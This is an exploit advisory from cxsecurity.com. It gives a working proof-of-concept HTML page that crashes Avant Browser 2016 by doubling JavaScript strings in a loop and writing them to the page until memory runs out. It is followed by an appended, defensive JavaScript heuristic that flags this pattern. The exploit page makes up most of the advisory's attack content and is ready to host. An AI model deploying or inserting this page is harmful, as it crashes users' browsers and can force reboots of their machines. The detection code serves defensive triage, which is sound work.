Avant Browser Remote DoS Exploit

Published: 2016.12.12
Credit: Ajay Gowtham
Risk: Medium
CWE: N/A
CVE: N/A
Local: No
Remote: Yes

#(+)Exploit Title: Avant Browser Remote DoS Exploit
#(+)Created By: Ajay Gowtham aka AJOXR
#(+)Software : Avant Browser
#(+)Tested On : Win-10-x64
#(+) E-mail : gowtham.ajay5()gmail.com
#About Browser: Avant Browser is an ultra-fast web browser. Its user-friendly interface brings a new level of clarity and efficiency to your browsing experience, and frequent upgrades have steadily improved its reliability.
#Exploit Description : It allows an attacker to crash the browser and throttle system usage. A reboot may be required.
------------------------EXPLOIT CODE-------------------------------------
//sploit.html
<html>
<title>Boom</title>
<head>
<h1>Avant Browser 2016 build 17, Stable Release</h1>
<p>Tested only on Windows 10 x64</p>
<p>Use at your own Risk</p>
<p>Exploit: Not Enough Free System Memory DoS Exploit. Perfectly Works Only on Avant Browser 2016</p>
<script>
function dos()
{
var longunistring1 = unescape("%u4141%u4141");
var longunistring2 = unescape("%u4242%u4242");
var longunistring3 = unescape("%u4343%u4343");
var longunistring4 = unescape("%u4444%u4444");
var longunistring5 = unescape("%u4545%u4545");
var longunistring6 = unescape("%u4646%u4646");
var longunistring7 = unescape("%u4747%u4747");

for(i=0; i <= 950 ; ++i)
{
longunistring1+=longunistring1;
longunistring2+=longunistring2;
longunistring3+=longunistring3;
longunistring4+=longunistring4;
longunistring5+=longunistring5;
longunistring6+=longunistring6;
longunistring7+=longunistring7;
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(longunistring5);
document.write(longunistring6);
document.write(longunistring7);
}
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(longunistring5);
document.write(longunistring6);
document.write(longunistring7);
}
</script>
</head>
<body>
<input type="button" value="Pwd!" onclick="dos();">
</body>
</html>
Solution
======
An update will be the solution.
# Contacted the vendor; no response for a long time.
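
Detection note (added example, not part of the original advisory or the author's code): a static triage heuristic for the pattern used above, where a string is appended to itself in a loop and then passed to document.write. The function names, the 1 GiB budget and the sample strings are assumptions made for illustration.

```javascript
// Added example (not from the advisory): static triage for self-doubling strings written to the DOM.

// Pull the text of inline <script> elements out of an HTML string.
function inlineScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Variables appended to themselves: "x += x" or "x = x + x".
function selfDoublingVars(js) {
  const re = /\b([A-Za-z_]\w*)\s*(?:\+=\s*\1\b|=\s*\1\s*\+\s*\1\b)/g;
  const names = new Set();
  let m;
  while ((m = re.exec(js)) !== null) names.add(m[1]);
  return [...names];
}

// Doublings needed before one string exceeds budgetBytes.
// Assumption: 2 bytes per UTF-16 code unit, no engine-side string length cap.
function doublingsToExceed(initialUnits, budgetBytes) {
  let bytes = initialUnits * 2, n = 0;
  while (bytes <= budgetBytes) { bytes *= 2; n++; }
  return n;
}

// Flag a self-doubling variable that is written to the DOM inside a loop long enough to pass the budget.
function triage(html, budgetBytes = 2 ** 30) {
  const findings = [];
  for (const js of inlineScripts(html)) {
    const bounds = [...js.matchAll(/\b(?:for|while)\s*\([^)]*?[<>]=?\s*(\d+)/g)]
      .map((m) => Number(m[1]));
    const maxBound = bounds.length ? Math.max(...bounds) : 0;
    for (const name of selfDoublingVars(js)) {
      const written = new RegExp(`document\\.write(?:ln)?\\s*\\(\\s*${name}\\s*\\)`).test(js);
      if (written && maxBound >= doublingsToExceed(2, budgetBytes)) {
        findings.push({ name, maxBound });
      }
    }
  }
  return findings;
}

// Constructed sample inputs (strings only, never executed).
const SUSPECT = '<script>var s = "AA"; for (i = 0; i <= 950; ++i) { s += s; document.write(s); }</script>';
const BENIGN = '<script>var t = "AA"; for (i = 0; i < 10; ++i) { t += "x"; document.write(t); }</script>';
console.log(triage(SUSPECT), triage(BENIGN));
```

Starting from the two-code-unit strings in the advisory, 29 doublings already exceed 1 GiB per string under the stated assumption, which is why a loop bound of 950 is flagged.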



Copyright 2017, cxsecurity.com